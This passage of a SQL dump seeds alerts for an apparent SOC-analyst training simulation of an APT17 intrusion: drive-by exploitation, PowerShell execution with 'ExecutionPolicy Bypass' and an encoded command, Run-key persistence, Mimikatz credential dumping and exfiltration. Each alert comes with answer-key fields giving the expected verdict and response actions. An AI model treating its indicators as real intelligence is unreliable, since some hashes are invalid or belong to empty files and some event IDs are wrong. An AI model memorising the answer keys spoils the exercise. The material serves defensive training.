APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fa26be19de6bff93f70bc2308434e4a440bbad02\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious script used by APT17.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell script intended for 
execution.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"clean\",\"details\":\"Legitimate user whose credentials were compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1202, 'Registry Modification Detected', 'medium', 'Host-based Intrusion Detection System', 'Detected suspicious registry modification activity associated with APT17. The modification ensures malware persistence through system reboots and user logins.', 'Persistence', 'T1112 - Modify Registry', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"system\":{\"computer\":\"DESKTOP-1A2B3C\",\"user\":{\"id\":\"S-1-5-21-123456789-234567890-345678901-1001\",\"name\":\"jdoe\",\"domain\":\"WORKGROUP\"}},\"event_data\":{\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"Updater\",\"registry_value\":\"\\\"C:\\\\Program Files\\\\Updater\\\\updater.exe\\\"\",\"process_id\":\"4748\",\"process_name\":\"regedit.exe\",\"network_info\":{\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-02-07 21:24:15', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash linked to APT17 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in persistence mechanisms.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_db\",\"verdict\":\"internal\",\"details\":\"User account of logged-in 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:59:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:58:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:57:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-08T18:56:02.522Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"computer\\\":\\\"DESKTOP-1A2B3C\\\",\\\"user\\\":{\\\"id\\\":\\\"S-1-5-21-123456789-234567890-345678901-1001\\\",\\\"name\\\":\\\"jdoe\\\",\\\"domain\\\":\\\"WORKGROUP\\\"}},\\\"event_data\\\":{\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"Updater\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\Updater\\\\\\\\updater.exe\\\\\\\"\\\",\\\"process_id\\\":\\\"4748\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_info\\\":{\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1203, 'Credential Dumping Activity', 'high', 'Security Information and Event Management (SIEM)', 'APT17 is utilizing harvested credentials to attempt lateral movement within the network. The objective is to access critical assets, thus deepening their infiltration. This activity involves the use of known malicious tools and compromised credentials, indicating an attempt to expand control over internal systems.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"username\":\"jdoe_admin\",\"event_type\":\"credential_dumping_attempt\",\"malware_filename\":\"Mimikatz.exe\",\"malware_hash\":\"12a3b456c789d012e34f5678g9012h34\",\"device\":\"Windows Server 2019\",\"action\":\"Attempted access to critical assets using dumped credentials\",\"outcome\":\"Blocked\"}', '2026-02-07 21:24:15', '2026-02-21 05:08:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT17 C2 server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Server targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Compromised admin account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"AV Scans\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"12a3b456c789d012e34f5678g9012h34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware 
Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.523Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"event_type\\\":\\\"credential_dumping_attempt\\\",\\\"malware_filename\\\":\\\"Mimikatz.exe\\\",\\\"malware_hash\\\":\\\"12a3b456c789d012e34f5678g9012h34\\\",\\\"device\\\":\\\"Windows Server 2019\\\",\\\"action\\\":\\\"Attempted access to critical assets using dumped credentials\\\",\\\"outcome\\\":\\\"Blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0),
(1204, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Anomaly Detection', 'In the final stage, APT17 uses encrypted communications to stealthily exfiltrate valuable data, completing their espionage mission while minimizing detection.', 'Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-21T14:52:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"encryption\":\"TLSv1.2\",\"file_hash\":\"7b50c2a1b2f3e3b5f0a1c2d3e4f5a6b7c8d9e0f1\",\"filename\":\"confidential_report.pdf\",\"username\":\"jdoe\",\"action\":\"data_exfiltration\"}', '2026-02-07 21:24:15', '2026-02-21 03:15:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT17.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7b50c2a1b2f3e3b5f0a1c2d3e4f5a6b7c8d9e0f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exfiltrated file known to contain sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"document_tracking\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document exfiltrated via encrypted 
channel.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_log\",\"verdict\":\"suspicious\",\"details\":\"User account involved in anomalous data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1205, 'Suspicious Web Traffic Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'APT17 has compromised a popular website frequented by employees of the targeted Japanese organizations. They are using it to deliver malicious payloads exploiting the Internet Explorer zero-day vulnerability (CVE-2013-3893). Initial access attempt detected via suspicious web traffic from a known malicious IP.', 'Initial Access', 'T1189: Drive-by Compromise', 1, 'closed', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"src_ip\":\"203.0.113.24\",\"dst_ip\":\"10.0.0.15\",\"src_port\":80,\"dst_port\":50232,\"protocol\":\"HTTP\",\"http_method\":\"GET\",\"http_url\":\"http://compromised-website.com/exploit\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_rule\":\"Exploit-Kit-Detected\"}', '2026-02-07 21:24:22', '2026-02-19 15:56:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT17 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal employee workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://compromised-website.com/exploit\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Website compromised by APT17 for watering hole attack.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 exploit 
delivery.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1206, 'Malware Execution Attempt Logged', 'medium', 'Endpoint Detection and Response (EDR)', 'Upon visiting the compromised site, the malicious payload is executed on the victim\'s machine, initiating the first step towards establishing a foothold within the network.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:07Z\",\"event_id\":\"EDR-123456\",\"computer_name\":\"WIN-10-PC\",\"user\":\"john_doe\",\"process_name\":\"powershell.exe\",\"file_path\":\"C:\\\\Users\\\\john_doe\\\\Downloads\\\\malicious_script.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\john_doe\\\\Downloads\\\\malicious_script.ps1\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.5\",\"detected_by\":\"EDR Agent v3.2\"}', '2026-02-07 21:24:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious script file executed\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Regular user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1207, 'Persistence Mechanism Established', 'medium', 'System Logs', 'APT17 established persistence on the compromised system by modifying registry keys and setting up backdoors. This allows them to maintain access even after system reboots. Indicators of compromise include registry changes and the presence of backdoor files.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T13:45:32Z\",\"event_id\":\"4720\",\"host_ip\":\"192.168.1.45\",\"user\":\"compromised_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backdoor\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"attacker_ip\":\"203.0.113.15\"}', '2026-02-07 21:24:22', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT17 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known APT17 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious filename related to persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account that was 
